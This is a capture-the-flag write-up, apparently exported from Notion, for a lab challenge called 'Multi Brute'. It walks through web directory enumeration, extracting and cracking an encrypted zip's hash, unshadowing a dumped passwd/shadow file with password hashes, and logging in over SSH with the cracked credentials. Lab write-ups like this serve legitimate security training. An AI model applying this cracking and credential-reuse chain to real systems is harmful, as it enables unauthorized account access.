💾
DuckDuckNo
/
...
/
🏁
Challenges
/
2 Multi Brute
Search
Duplicate
Notion
2 Multi Brute
Tags
Redteam
Cracking
Solved
DESCRIPTION
The target has encrypted zip archive with user's password hash.
QUESTION
Get the flag from unauthenticated user's /home folder.
SOLUTION
gobuster & dirb on website
/style (Status: 301) /admin (Status: 401) /backup (Status: 401) /back-up/ (Status: 301)
Python
Directory listing contains this file
zip2john hash:
etc.zip:$pkzip2$3*2*1*0*0*24*21c0*7378*5fc321adea8093c713efe5dd3320c714d4b2fd55733bd70164c0bb8ee869b203e9463a98*1*0*8*24*d5d8*850a*c84e4b038d021040b7c9c54e4643dcd486eb3907db24de98e5a91bd6f4766bb6934ba3f5*2*0*14*8*7d6eaedd*115eda*46*0*14*7d6e*6192*705281af0aefdc0853951eaa20b3a0062db9a41c*$/pkzip2$::etc.zip:etc/timezone, etc/alternatives/pager.1.gz, etc/alternatives/rmt:etc.zip
Bash
Password kawasaki
Zip includes shadow and passwd file. Unshadowed:
unshadow passwd shadow > unshadowed.txt root:$6$cxcypMbV$TGMeN9JF366mtt1F11esBSskA3bjjHPLvM3OYHMOKI8sn76KGsCra.nQ8icPl4MqNfsMUgJCDVxRMHmDunMxR1:0:0:root:/root:/bin/bash daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:*:2:2:bin:/bin:/usr/sbin/nologin sys:*:3:3:sys:/dev:/usr/sbin/nologin sync:*:4:65534:sync:/bin:/bin/sync games:*:5:60:games:/usr/games:/usr/sbin/nologin man:*:6:12:man:/var/cache/man:/usr/sbin/nologin lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:*:8:8:mail:/var/mail:/usr/sbin/nologin news:*:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:*:13:13:proxy:/bin:/usr/sbin/nologin www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin backup:*:34:34:backup:/var/backups:/usr/sbin/nologin list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:*:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false _apt:*:104:65534::/nonexistent:/bin/false sshd:*:105:65534::/var/run/sshd:/usr/sbin/nologin web:$6$atmd0b/W$VLg6V9zMi2Q9Jfir2GqUI9er6Csnkgs3O3CuFCVafyC2xE33zbADHqwkH6.I9jclVJbsAwZECaC/JAukxyhab/:1000:1000::/home/web:/bin/bash
Shell
SSH credentials: web:liverpool
Log in and grab the flag